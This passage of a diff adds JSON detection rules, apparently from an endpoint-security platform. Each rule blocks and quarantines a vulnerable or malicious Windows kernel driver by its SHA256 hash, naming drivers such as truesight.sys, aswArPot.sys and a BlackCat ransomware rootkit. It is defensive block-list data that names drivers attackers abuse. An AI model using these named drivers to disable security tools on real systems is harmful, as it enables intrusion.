+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c22b46e8-3414-5573-8256-da6bc14de01d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981839Z",
+ "creation_date": "2026-03-23T11:45:29.981841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981846Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8",
+ "comment": "Vulnerable Kernel Driver (aka TestBone.sys) [https://www.loldrivers.io/drivers/be4843ef-a2a8-4a0d-91c6-42e165800bb0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2367434-8e90-5aae-8bec-da2d78f0a4f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500309Z",
+ "creation_date": "2026-03-23T11:45:31.500312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500320Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7041b742a7332c981f9ad28f3e9c11ef4667ab64242c5e8f3af589ed454c6587",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c239d57c-1c0d-5638-bc7f-7bd9ad989ced",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612457Z",
+ "creation_date": "2026-03-23T11:45:29.612459Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e777b95e5432b2a7f43d515c7e7a34d34abc530881c833765f634b2449a8910d",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c23bbf4a-80ae-5e1f-9a38-af08d5e865f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830095Z",
+ "creation_date": "2026-03-23T11:45:30.830097Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b56b6cadbf270f86a937878e3383485bd473b81b5afca5561308fa34c6000ebc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c23bc317-3d1f-57fc-98e6-2dc419c756af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831091Z",
+ "creation_date": "2026-03-23T11:45:30.831093Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831099Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7888b85212909ca68906d64a1f0c3ec48edb86e3b24f0f1545f6980f1c37cbca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c23f60cd-2c04-55dd-9bbc-e5a2547d4806",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616587Z",
+ "creation_date": "2026-03-23T11:45:29.616589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f487829527802983d5c120e3b99f3cf89333ca14f5e49ac32df0798cfb1f7aa",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c25927f1-2fc3-5b3b-b056-a27c01d21fb0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968758Z",
+ "creation_date": "2026-03-23T11:45:29.968760Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968766Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8efe2cc534bf32fd7d5413005388125a2f449049c95437eae7c98584c403f67",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c266398c-aa31-51be-a0b2-ea7a10700c7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830789Z",
+ "creation_date": "2026-03-23T11:45:30.830791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830796Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b14d3075284ca8e7eba4a2b4dfe6ca26b5e31f753ac33b4934baaaece9b08cf4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c26f404f-841c-5484-874c-c6c5de02b153",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972789Z",
+ "creation_date": "2026-03-23T11:45:29.972791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "401ed2d2768707b5c47556774c119f989986a9e2fa88e1e2626f14e22b85e66b",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2742a95-ac6b-59a0-8f5f-fe5585efde08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453192Z",
+ "creation_date": "2026-03-23T11:45:30.453196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453205Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94c226a530dd3cd8d911901f702f3dab8200d1d4fdc73fcb269f7001f4e66915",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c28e38a4-5fa1-5eb8-8701-01e047946cac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619229Z",
+ "creation_date": "2026-03-23T11:45:29.619231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619236Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2b018f5-4749-598c-b84b-e4bdd71ef414",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815544Z",
+ "creation_date": "2026-03-23T11:45:31.815546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815551Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8f3e786fada6226e6765bdd85e1383feb276ba457f4874f5932c9e0ebc176ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2b46b68-33a6-50a4-99c9-d9e2365caabe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473543Z",
+ "creation_date": "2026-03-23T11:45:30.473546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "148ca220316fe9a0af2b12ed9528273295009d8568bf4c47fbfd4605f0ce2acc",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2b9de64-b7bc-59a9-9915-0696085e38ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476079Z",
+ "creation_date": "2026-03-23T11:45:30.476082Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f84f009704bc36f0e97c7be3de90648a5e7c21b4f870e4f210514d4418079a0",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2bc276f-7974-5c52-9b73-4eb008a89007",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144598Z",
+ "creation_date": "2026-03-23T11:45:31.144600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be14b834a7208b4bdfbd972430982b50271cf4eef50b73e36b1ba5f2d47eef3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2c57492-388f-561d-8779-989c2498c93e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458401Z",
+ "creation_date": "2026-03-23T11:45:30.458404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37b9fbd6547091b83b2595bb0f9f9035ae95111868a4393aab52bf22087233d7",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2c6548c-680e-5b35-9e53-db1ab90eac01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972891Z",
+ "creation_date": "2026-03-23T11:45:29.972892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2c77f36-8901-565b-9684-4b8747327f9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809365Z",
+ "creation_date": "2026-03-23T11:45:31.809368Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809377Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72ed058bd82712b99fc7f4be1d1d21e2bebb3e00bfa02f6decd88b0a355bbd3d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2d2eef3-9c16-5345-968b-2828e6108998",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827402Z",
+ "creation_date": "2026-03-23T11:45:31.827404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827412Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b64ad2118cbfab21d5033127e54c554abcf83d831bf1b838fbce813a0611b72",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2ec77ed-0df3-517a-ad26-28ce94297c62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824138Z",
+ "creation_date": "2026-03-23T11:45:30.824141Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbefbb040e8596db4da7450d5823d8708493c1328a57202e86d21b72f7d14eab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2f7b5c9-43b5-5f42-b385-58330df686d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479912Z",
+ "creation_date": "2026-03-23T11:45:31.479916Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43483edb6a5f8b94df4660b0b7e907d7e9d6aa64de8999c17181e87d58203571",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2f92672-4708-5db3-8d59-4b34fad11fe0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985502Z",
+ "creation_date": "2026-03-23T11:45:29.985504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0527451d72ba02db8479ea69689350cc563b939bb2cc685386719ab32b7e2772",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
